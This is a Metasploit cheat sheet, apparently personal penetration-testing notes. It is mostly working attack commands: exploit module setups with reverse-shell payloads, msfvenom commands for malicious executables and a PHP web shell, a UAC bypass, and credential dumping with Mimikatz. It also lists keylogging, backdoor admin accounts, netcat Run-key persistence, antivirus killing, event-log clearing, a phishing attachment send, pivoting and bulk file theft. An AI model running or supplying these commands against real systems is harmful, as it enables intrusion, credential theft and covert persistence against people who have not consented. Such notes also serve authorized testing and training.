Metasploit


# OS X

No MacPorts or Homebrew needed.
Download the latest installer and run: http://osx.metasploit.com
Answer yes to all the questions.
/opt/metasploit-framework/bin/msfconsole
------------------------------------------------------------------------------------------------------

service postgrsql start       Start the PostreSQL db.
msfconsole                    Start Metasploit.
msf > db_status               Check that you are connected to the db.
------------------------------------------------------------------------------------------------------

# Setup - create new user and db

root@kali:~# service postgresql start
root@kali:~# su postgres
postgres@kali:~$ createuser <username> -P
Enter password for new role: 
Enter it again: 
postgres@kali:~$ createdb --owner=<username> msf
postgres@kali:~$ exit

# Autoconnect to db

nano ~/.msf5/database.yml
production:
    adapter: postgresql
    database: msf
    username: <username>
    password: <password>
    host: 127.0.0.1
    port: 5432
    pool: 5
    timeout: 5
------------------------------------------------------------------------------------------------------

help or ?                     Show available commands and their descriptions.
show -h                       Show help on the 'show' command.

search <string>               Search for a particular string.
search ms08                   Show all Microsoft exploits released in 2008.

use <exploit>
use exploit/windows/smb/ms08_067_netapi
show targets                  Show various OSs that can be targeted with this exploit.
show payloads                 Show all payloads that work with this exploit.
set PAYLOAD windows/meterpreter/reverse_tcp
show options                  Show remainging options for the payload.
set LPORT 443                 Set the listening port to 443.
set LHOST <attacker IP>       Set the listner to the attacker's IP.
show advanced
show evasion
exploit                       Run the exploit.
------------------------------------------------------------------------------------------------------

# Animated cursor vulnerability. This exploit does not fire until a victim browses to our malicious website.

use exploit/windows/browser/ani_loadimage_chunksize
set URIPATH /
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 443
exploit
------------------------------------------------------------------------------------------------------

# Apache Tomcat Manager Common Administrative Credentials

use multi/tomcat_mgr_deploy
show options
set password admin
set username admin
set RHOST <target IP>
set RPORT <target port>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
exploit
------------------------------------------------------------------------------------------------------

# msfvenom

msfvenom -p <payload parameter=value> -f <file format> --playform <OS platform> -o <output file>
 
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.2.7 LPORT=443 -f exe --platform windows -o evil.exe
------------------------------------------------------------------------------------------------------

# psexec

use windows/smb/psexec
set RHOST <target IP>
set SMBPass <Administrator hash from another target>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
exploit
------------------------------------------------------------------------------------------------------

# Sessions

sessions -l                   Show active sessions.
sessions -i 2                 Interact with session 2.
------------------------------------------------------------------------------------------------------

# Post Exploitation with Meterpreter

migrate                                       Create a new process and migrate to it.
sysinfo                                       Show system info.
getuid                                        Show current privileges.

# Escalate Privileges

getsystem                                     If this fails, background the session.
background

use exploit/windows/local/bypassuac_vbs
set session <#>                               
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 4444                                This MUST be a different port from what was used in the original exploit.
exploit

migrate
getuid
getsystem
getuid                                        Privileges should now be NT AUTHORITY\SYSTEM.
------------------------------------------------------------------------------------------------------

# Dump hashes & passwords

hashdump                                      Try to dump password hashes. If this fails continue.
ps                                            Show running processes.
migrate <pid>                                 Migrate to a specific process running as NT AUTHORITY\SYSTEM.
hashdump

load kiwi                                     Mimikatz
lsa_dump                                      Show the current user password in plain text.
creds_all                                     Show all user passwords in plain text.
wifi_list                                     Show all wireless networks that have been connected and passwords.
------------------------------------------------------------------------------------------------------

# Misc

ipconfig                                      Look for dual-homed connections.
     autoroute -s <new CIDR range>            If dual-homed.
     autoroute -p                             Print routing table.
netstat

screenshot                                    Take a photo of the desktop.

idletime
     if time < 5 min
     keyscan_start                            Start the keylogger.
     keyscan_stop                             Stop the keylogger.
     keyscan_dump                             Dump keystrokes.

run vnc
     if the screen is locked exit VNC
     meterpreter > run screen_unlock
meterpreter > run get_application_list
meterpreter > run winenum

enum_logged_on_users

run getgui -u hacker -p password

use incognito
list_tokens -u
impersonate_token <domain>\\<user>

add_user hacker password -h <target IP>
add_group_user "Domain Admins" hacker -h <target IP>

shell                                         Drop into a Windows shell.
net user                                      List local users.
net accounts                                  List local password policy.
net user hacker password /add /domain         Try to add a new domain account.
net user hacker password /add                 Add a new local account.
net localgroup Administrators hacker /add     Add new account to the local Administrators Security Group
net localgroup Administrators                 Verify account is in the group.
clearev                                       Clear event logs.
------------------------------------------------------------------------------------------------------

# Database

msf > help database

Database Backend Commands
=========================

    Command                   Description
    -------                   -----------
    creds                     List all credentials in the database
    db_connect                Connect to an existing database
    db_disconnect             Disconnect from the current database instance
    db_export                 Export a file containing the contents of the database
    db_import                 Import a scan result file (filetype will be auto-detected)
    db_nmap                   Executes nmap and records the output automatically
    db_rebuild_cache          Rebuilds the database-stored module cache
    db_status                 Show the current database status
    hosts                     List all hosts in the database
    loot                      List all loot in the database
    notes                     List all notes in the database
    services                  List all services in the database
    vulns                     List all vulnerabilities in the database
    workspace                 Switch between database workspaces

services -p 22                List specific ports.
services -s http              List specific services.

workspace                     List workspaces.
* default                     * shows the active workspace.
  client1
  client5

workspace client1             Switch workspace.

workspace                     List workspaces.
  default
* client1                     * shows the active workspace.
  client5

workspace -a <name>           Add workspace(s).
workspace -d <name>           Delete workspace(s).
workspace -r <old> <new>      Rename workspace.
------------------------------------------------------------------------------------------------------

# Generate a Payload/Executable

Generating a reverse payload and save as an executable:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=attackIP LPORT=443 -f exe > evil.exe

Generate a bind payload that avoids a bad character:
msfvenom -p windows/meterpreter/bind_tcp -b '\x00'

Generate a bind payload and encode it 3 times:
msfvenom -p windows/meterpreter/bind_tcp -e x86/shikata_ga_nai -i 3

Inject a bind payload into calc.exe and save it as an executable: 
msfvenom -p windows/meterpreter/bind_tcp -x calc.exe -k -f exe > calc2.exe
------------------------------------------------------------------------------------------------------

# Persistance

Example 1
Upload netcat.
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32\\

Check for anything the runs at startup.
meterpreter > reg enumkey -k HKLM\\software\\windows\\currentversion\\run

Add a registry key.
meterpreter > reg setval -k HKLM\\software\\windows\\currentversion\\run -v netcat -d ‘c:\windows\system32\nc.exe -ldp 4444 -e cmd.exe'

Verify changes to the registry.
meterpreter > reg queryval -k HKLM\\software\\windows\\currentversion\\run -v netcat

Reboot the target system.
meterpreter >  reboot

Connect to target system - option 1
nc -vn <target IP> 443

Connect to target system - option 2
use multi/handler
set PAYLOAD windows/shell_bind_tcp
set RHOST <target IP>
exploit

Example 2
meterpreter > run metsvc
Note the port that is used.
use multi/handler
set PAYLOAD windows/metsvc_bind_tcp
set LPORT <port>
set RHOST <target IP>
exploit
--------------------------------------------------------------------------------

# Phishing

use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set EnableStageEncoding true
set ExitOnSession false
set LPORT 443
exploit -j
 
sendEmail -t ceo@target.com -f hacker@gmail.com -s <target IP> -u Salaries -a /root/Desktop/salaries.pdf
------------------------------------------------------------------------------------------------------

# Pivoting
 
meterpreter > ipconfig
192.168.0.10
255.255.255.0
 
10.0.0.5
255.255.255.0
 
meterpreter > run arp_scanner -r 10.10.10.1/24
10.0.0.1
10.0.0.2
10.0.0.5
10.0.0.20

meterpreter > background
route add 10.0.0.1 255.255.255.0 x            Where x is the meterpreter session ID.
route print
use auxiliary/scanner/portscan/tcp
set RHOSTS 10.0.0.20
set PORTS 1-200
set THREADS 255
exploit
use exploit/windows/smb/ms08_067_netapi
set RHOST 10.0.0.20
set PAYLOAD windows/meterpreter/bind_tcp
exploit
------------------------------------------------------------------------------------------------------

# Web shell php meterpreter

msfvenom -p php/meterpreter/reverse_tcp LHOST=10.0.0.5 -f raw > evil.php

Upload file to target web server.

use exploit/multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 10.0.0.5
exploit

Execute evil.php on web server.
------------------------------------------------------------------------------------------------------

===  Below here are OLD notes that have NOT been organized.  ===

upload <local path> <remote path>
upload /root/putty.exe C:\\Documents\ and\ Settings\\Administrator\Desktop\

run checkvm
run getcountermeasure
run get_local_subnets
run killav
run getgui -e
<open a new tab>
rdesktop <target IP>

run gettelnet -u root -p toor
<open a new tab>
telnet <target IP>
root
toor
dir

run scheduleme -m 1 -u -e /root/test.exe

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <attacker IP>
set LPORT 443
set ExitOnSession false
# set AutoRunScript <Path to script you want to autorun after exploit is fired.> 
set AutoRunScript persistence -r <target IP> -p 21 -A -X -i 30 
exploit -j -z

# Find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office 
run search_dwld "%USERPROFILE%\\desktop" office

# Alternate 
download -r "%USERPROFILE%\\desktop"  ~/
download -r "%USERPROFILE%\\my documents"  ~/

# Alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t

run getgui
run killav
run winemun
run memdump
run screen_unlock

upload /tmp/system32.exe C:\\windows\\system32\\ 
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run 
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v system32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe" 
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v system32 
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list 
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess\\parameters\\firewallpolicy\\Standardprofile\\authorizedapplications\\list -v system32 
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings\\application data\\microsoft\\" 

# Using payload as a backdoor from a shell 

REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v firewall /t REG_SZ /d "c:\windows\system32\evil.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\evil.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\evil.exe"  /ED 11/11/2011

set options "InitialAutoRunScript=migrate -f", "AutoRunScript=post/multi/gather/run_console_rc_file RESOURCE=/opt/scripts/resource/post.rc

auxiliary(mssql_sql) > set sql EXEC sp_addlogin hacker, password;EXEC master.dbo.sp_addsrvrolemember hacker, sysadmin;  —priv
run
